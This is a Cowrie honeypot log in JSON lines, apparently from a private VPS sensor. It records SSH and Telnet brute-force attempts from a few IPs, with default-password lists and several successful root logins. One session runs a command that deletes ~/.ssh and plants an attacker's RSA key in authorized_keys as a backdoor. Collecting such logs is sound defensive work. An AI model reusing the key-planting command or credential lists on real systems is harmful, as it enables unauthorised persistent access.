{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:11:49.423690Z","src_ip":"212.227.235.229","session":"254b3f2b0f18"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Welcome1","message":"login attempt [ubuntu/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:11:50.461702Z","src_ip":"212.227.235.229","session":"254b3f2b0f18"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:11:51.720914Z","src_ip":"212.227.235.229","session":"254b3f2b0f18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40070,"dst_ip":"1.2.3.4","dst_port":22,"session":"300c54042395","protocol":"ssh","message":"New connection: 212.227.235.229:40070 (1.2.3.4:22) [session: 300c54042395]","sensor":"my-vps","timestamp":"2025-09-09T02:11:55.835806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:11:55.836742Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:11:56.134764Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.login.success","username":"root","password":"1234@Abcd","message":"login attempt [root/1234@Abcd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:11:57.328898Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:11:57.972727Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:11:57.973467Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:11:57.974327Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:11:58.275230Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:11:58.890205Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:11:58.890932Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:11:59.192447Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:11:59.193316Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41372,"dst_ip":"1.2.3.4","dst_port":22,"session":"33b93d2babfd","protocol":"ssh","message":"New connection: 212.227.235.229:41372 (1.2.3.4:22) [session: 33b93d2babfd]","sensor":"my-vps","timestamp":"2025-09-09T02:11:59.394408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:11:59.396991Z","src_ip":"212.227.235.229","session":"33b93d2babfd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:11:59.647420Z","src_ip":"212.227.235.229","session":"33b93d2babfd"}
{"eventid":"cowrie.session.closed","duration":12.774231195449829,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:00.538886Z","src_ip":"212.227.125.160","session":"2e759f925611"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:12:00.655001Z","src_ip":"212.227.235.229","session":"33b93d2babfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39286,"dst_ip":"1.2.3.4","dst_port":23,"session":"563d252725a6","protocol":"telnet","message":"New connection: 212.227.125.160:39286 (1.2.3.4:23) [session: 563d252725a6]","sensor":"my-vps","timestamp":"2025-09-09T02:12:00.750491Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:01.909694Z","src_ip":"212.227.235.229","session":"33b93d2babfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39422,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d8c8c7bc8e9","protocol":"ssh","message":"New connection: 212.227.235.229:39422 (1.2.3.4:22) [session: 7d8c8c7bc8e9]","sensor":"my-vps","timestamp":"2025-09-09T02:12:02.095345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:12:02.096021Z","src_ip":"212.227.235.229","session":"7d8c8c7bc8e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42472,"dst_ip":"1.2.3.4","dst_port":22,"session":"689572e59b82","protocol":"ssh","message":"New connection: 212.227.235.229:42472 (1.2.3.4:22) [session: 689572e59b82]","sensor":"my-vps","timestamp":"2025-09-09T02:12:02.175139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:12:02.176623Z","src_ip":"212.227.235.229","session":"689572e59b82"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:12:02.182567Z","src_ip":"212.227.235.229","session":"7d8c8c7bc8e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:12:02.443399Z","src_ip":"212.227.235.229","session":"689572e59b82"}
{"eventid":"cowrie.login.failed","username":"builder","password":"password","message":"login attempt [builder/password] failed","sensor":"my-vps","timestamp":"2025-09-09T02:12:02.570070Z","src_ip":"212.227.235.229","session":"7d8c8c7bc8e9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:12:03.546109Z","src_ip":"212.227.235.229","session":"689572e59b82"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:03.658581Z","src_ip":"212.227.235.229","session":"7d8c8c7bc8e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39010,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f6a631c01f5","protocol":"ssh","message":"New connection: 212.227.235.229:39010 (1.2.3.4:22) [session: 6f6a631c01f5]","sensor":"my-vps","timestamp":"2025-09-09T02:12:03.715897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:12:03.722864Z","src_ip":"212.227.235.229","session":"6f6a631c01f5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:03.811545Z","src_ip":"212.227.235.229","session":"689572e59b82"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:03.856308Z","src_ip":"212.227.235.229","session":"300c54042395"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:12:04.113129Z","src_ip":"212.227.235.229","session":"6f6a631c01f5"}
{"eventid":"cowrie.login.failed","username":"gateway","password":"gateway","message":"login attempt [gateway/gateway] failed","sensor":"my-vps","timestamp":"2025-09-09T02:12:05.681167Z","src_ip":"212.227.235.229","session":"6f6a631c01f5"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:07.075697Z","src_ip":"212.227.235.229","session":"6f6a631c01f5"}
{"eventid":"cowrie.session.closed","duration":12.804896593093872,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:13.555313Z","src_ip":"212.227.125.160","session":"563d252725a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39577,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a156fe11133","protocol":"telnet","message":"New connection: 212.227.125.160:39577 (1.2.3.4:23) [session: 2a156fe11133]","sensor":"my-vps","timestamp":"2025-09-09T02:12:13.764180Z"}
{"eventid":"cowrie.session.closed","duration":12.777251482009888,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:26.541339Z","src_ip":"212.227.125.160","session":"2a156fe11133"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39873,"dst_ip":"1.2.3.4","dst_port":23,"session":"e60379c97118","protocol":"telnet","message":"New connection: 212.227.125.160:39873 (1.2.3.4:23) [session: e60379c97118]","sensor":"my-vps","timestamp":"2025-09-09T02:12:26.752057Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49358,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc4a59bf3b37","protocol":"ssh","message":"New connection: 212.227.235.229:49358 (1.2.3.4:22) [session: bc4a59bf3b37]","sensor":"my-vps","timestamp":"2025-09-09T02:12:29.123654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:12:29.144145Z","src_ip":"212.227.235.229","session":"bc4a59bf3b37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:12:32.443494Z","src_ip":"212.227.235.229","session":"bc4a59bf3b37"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T02:12:33.217137Z","src_ip":"212.227.235.229","session":"bc4a59bf3b37"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:34.471898Z","src_ip":"212.227.235.229","session":"bc4a59bf3b37"}
{"eventid":"cowrie.session.closed","duration":12.782261610031128,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:39.534241Z","src_ip":"212.227.125.160","session":"e60379c97118"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40174,"dst_ip":"1.2.3.4","dst_port":23,"session":"2be9cfaec916","protocol":"telnet","message":"New connection: 212.227.125.160:40174 (1.2.3.4:23) [session: 2be9cfaec916]","sensor":"my-vps","timestamp":"2025-09-09T02:12:39.761639Z"}
{"eventid":"cowrie.session.closed","duration":12.797478437423706,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:52.559058Z","src_ip":"212.227.125.160","session":"2be9cfaec916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40503,"dst_ip":"1.2.3.4","dst_port":23,"session":"1b6dca78bbbd","protocol":"telnet","message":"New connection: 212.227.125.160:40503 (1.2.3.4:23) [session: 1b6dca78bbbd]","sensor":"my-vps","timestamp":"2025-09-09T02:12:52.761918Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52736,"dst_ip":"1.2.3.4","dst_port":22,"session":"01e53262e649","protocol":"ssh","message":"New connection: 217.72.205.35:52736 (1.2.3.4:22) [session: 01e53262e649]","sensor":"my-vps","timestamp":"2025-09-09T02:12:53.305751Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:12:53.306908Z","src_ip":"217.72.205.35","session":"01e53262e649"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33624,"dst_ip":"1.2.3.4","dst_port":23,"session":"d5e2ab2f5c7c","protocol":"telnet","message":"New connection: 212.227.125.160:33624 (1.2.3.4:23) [session: d5e2ab2f5c7c]","sensor":"my-vps","timestamp":"2025-09-09T02:12:57.779309Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:12:57.864747Z","src_ip":"212.227.125.160","session":"d5e2ab2f5c7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:12:57.935450Z","src_ip":"212.227.125.160","session":"d5e2ab2f5c7c"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T02:12:57.937480Z","src_ip":"212.227.125.160","session":"d5e2ab2f5c7c"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T02:12:57.938864Z","src_ip":"212.227.125.160","session":"d5e2ab2f5c7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40306,"dst_ip":"1.2.3.4","dst_port":22,"session":"550bd52113c7","protocol":"ssh","message":"New connection: 212.227.235.229:40306 (1.2.3.4:22) [session: 550bd52113c7]","sensor":"my-vps","timestamp":"2025-09-09T02:12:59.991168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:12:59.992198Z","src_ip":"212.227.235.229","session":"550bd52113c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-ni